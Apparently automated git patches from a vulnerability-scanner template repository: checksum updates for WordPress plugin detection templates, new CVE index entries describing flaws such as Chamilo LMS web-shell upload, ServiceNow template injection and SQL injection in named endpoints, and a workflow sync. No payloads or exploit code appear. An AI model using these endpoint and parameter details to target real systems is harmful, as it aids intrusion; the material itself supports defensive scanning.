-http/technologies/wordpress/plugins/wordpress-importer.yaml:33fa033d6c9faa3ac97c940148e3175388a50621 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d847216a5097fa6f600ef6d0e7889803b8986bb8 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:b67c1aaa00a8f9bb1b14e5669b686e4bb0d9544b -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:f32a9b560458276e9bdded8767c3d648040c2088 -http/technologies/wordpress/plugins/wp-file-manager.yaml:2d0dfda02d741eafa94293ee3acc1f29a899bb7c -http/technologies/wordpress/plugins/wp-google-maps.yaml:400e2f66a1cc853dc214783b259fd6cf8915764f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8ef216b1cb8322ee974033351a6bd6822a5c54ae -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:1b04964ce7c9d28fca99c646706322a3fbc07046 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:87cf5360bc373ded6ba5e6d63bc6c2233658444b -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:264f60522dd91e6beb72a5ff087145144d9dbcec -http/technologies/wordpress/plugins/wp-optimize.yaml:63ec01f92e69db4120dfa53954673d77ce08d677 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5416c2bbbcbedd6ceb1bf25307a3736548c180d5 -http/technologies/wordpress/plugins/wp-reset.yaml:2e6c66afb9d3fc4bff9aa1ad5d291db99d4432ac -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:5c92045038d77527bd77c5b8e1fceaaec61f0aa5 -http/technologies/wordpress/plugins/wp-rollback.yaml:359caa5ba74eda80215445401911e553271074c6 -http/technologies/wordpress/plugins/wp-seopress.yaml:0973617dc3ff63341016addeeda6cb61ecd529e3 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74a96d30e68e41ebcddf7800a3101fe00e91dc00 -http/technologies/wordpress/plugins/wp-smushit.yaml:18153a5981abd160d9f7e49fa1a9b265985d8d91 -http/technologies/wordpress/plugins/wp-statistics.yaml:3dd770a375e986ef8fbc71190c9cb80a8262fc35 -http/technologies/wordpress/plugins/wp-super-cache.yaml:7c42ff5457c3ae6168dbf61a451127ccafceaa9d +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:fa1f9d043a9ed24d60ff179ad7c53d8a62b5d080 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:f7c444844389673b9ee38cae71bb287bc13c2177 -http/technologies/wordpress/plugins/wpforms-lite.yaml:18d3a2306187baca443d85f964fd88a5c6279571 -http/technologies/wordpress/plugins/wps-hide-login.yaml:8983308eda9ff079ecc6dd650ccce1a75589c66a -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:12ad0ab316fabb50b81984d70a5ec919b057b1c3 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5e465c8d86b72daa14c25e2cc1557f47bd49f1f3 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8873,7 +8874,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3e7c8b0e0bf0eab7c9d437bb65f9088a97313ed3 +templates-checksum.txt:c8932cc37db88668f0222cf912925722240b4934 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3e992cf88e45c22117a349e6a381832c545542ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:44:18 +0000 Subject: [PATCH 1221/1841] Auto Generated cves.json [Mon Jul 15 04:44:18 UTC 2024] :robot: --- cves.json | 7 +++++++ cves.json-checksum.txt | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index fc27b33e55..48b0e65d86 100644 --- a/cves.json +++ b/cves.json @@ -1941,6 +1941,7 @@ {"ID":"CVE-2022-44957","Info":{"Name":"WebTareas 2.4p5 - Cross-Site Scripting","Severity":"medium","Description":"webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44957.yaml"} {"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"} {"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"} +{"ID":"CVE-2022-45269","Info":{"Name":"Linx Sphere - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-45269.yaml"} {"ID":"CVE-2022-45354","Info":{"Name":"Download Monitor \u003c= 4.7.60 - Sensitive Information Exposure","Severity":"high","Description":"The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-45354.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"medium","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"} {"ID":"CVE-2022-45365","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site-Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45365.yaml"} @@ -2261,6 +2262,7 @@ {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} +{"ID":"CVE-2023-4220","Info":{"Name":"Chamilo LMS \u003c= 1.11.24 - Remote Code Execution","Severity":"medium","Description":"Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS \u003c= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4220.yaml"} {"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"} {"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} @@ -2274,6 +2276,7 @@ {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} +{"ID":"CVE-2023-44012","Info":{"Name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44012.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} @@ -2394,6 +2397,7 @@ {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} {"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"} +{"ID":"CVE-2024-2330","Info":{"Name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2330.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} {"ID":"CVE-2024-23692","Info":{"Name":"Rejetto HTTP File Server - Template injection","Severity":"critical","Description":"This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23692.yaml"} @@ -2465,6 +2469,7 @@ {"ID":"CVE-2024-37032","Info":{"Name":"Ollama - Remote Code Execution","Severity":"critical","Description":"Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37032.yaml"} {"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} +{"ID":"CVE-2024-3742","Info":{"Name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","Severity":"high","Description":"Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-3742.yaml"} {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} @@ -2475,8 +2480,10 @@ {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"} +{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"} +{"ID":"CVE-2024-5217","Info":{"Name":"ServiceNow - Incomplete Input Validation","Severity":"critical","Description":"ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5217.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index c57eb97482..9fc4b47fbc 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1f295df512d3eeba2ed9182053c6288 +58f28adddb059a43b0d499b154186d90 From 352a4720e141ff509feb7a9ede526ed8f4c77898 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:44:52 +0000 Subject: [PATCH 1222/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4017e73457..2592a9098f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,8 @@ on: - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-4879.yaml' + - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' From e9c5ae4bf55814de8f80c2bbacb121a159cf8f36 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:45:55 +0000 Subject: [PATCH 1223/1841] Auto Template Signing [Mon Jul 15 04:45:55 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4879.yaml | 1 